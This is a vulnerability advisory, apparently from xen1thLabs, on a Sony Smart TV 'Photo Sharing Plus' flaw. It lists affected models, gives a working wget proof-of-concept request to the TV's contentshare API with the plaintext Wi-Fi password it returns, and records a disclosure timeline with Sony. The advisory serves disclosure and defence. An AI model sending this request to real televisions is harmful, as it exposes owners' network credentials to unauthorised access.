Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

23 April 2019












6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)



















Sony Smart TVs (non-exhausted list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E








The “Photo Sharing Plus” application running inside the Smart TV functionality is to upload photos from a smartphone to the TV, in order to display on the television screen. When the application is launched, it allows the TV to be a Wi-Fi access point and displays the Wi-Fi password allowing to authenticate and share media content on the Sony Smart TV.

The vulnerability allows an attacker - without authentication from the LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started.




An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.




After starting the application, the following example retrieves the wireless password created from the TV (IP of the TV is over the LAN, without authentication:




root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo" ,"params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/


{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/" ,"touchPadRemote":"notSupported"}],"id":80}



The password is 8362tbwX.

By reading logs in the TV, we can confirm the password has been delivered over HTTP, without authentication:



01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/" ,"touchPadRemote":"notSupported"}],"id":80}
































03/10/2018 – Vulnerability found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms vulnerability

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to xen1thLabs talk at HiTB Dubai 2018 as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thlabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory  

21/03/2019 – Automatic response from is no more in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affects a range of models and “Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019.”

16/04/2019 - Sony does not provide a CVE. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"

17/04/2019 - xen1thLabs requests a CVE from MITRE

23/04/2019 - Public disclosure












Apply patches provided by Sony

Firmware update to v6.5830 from 01-22-2019 (including security patches?)


Firmware update to v6.5830 from 01-22-2019 (not including security patches)


End of Photo Sharing Plus 11/22/2018




xen1thLabs - Telecom Lab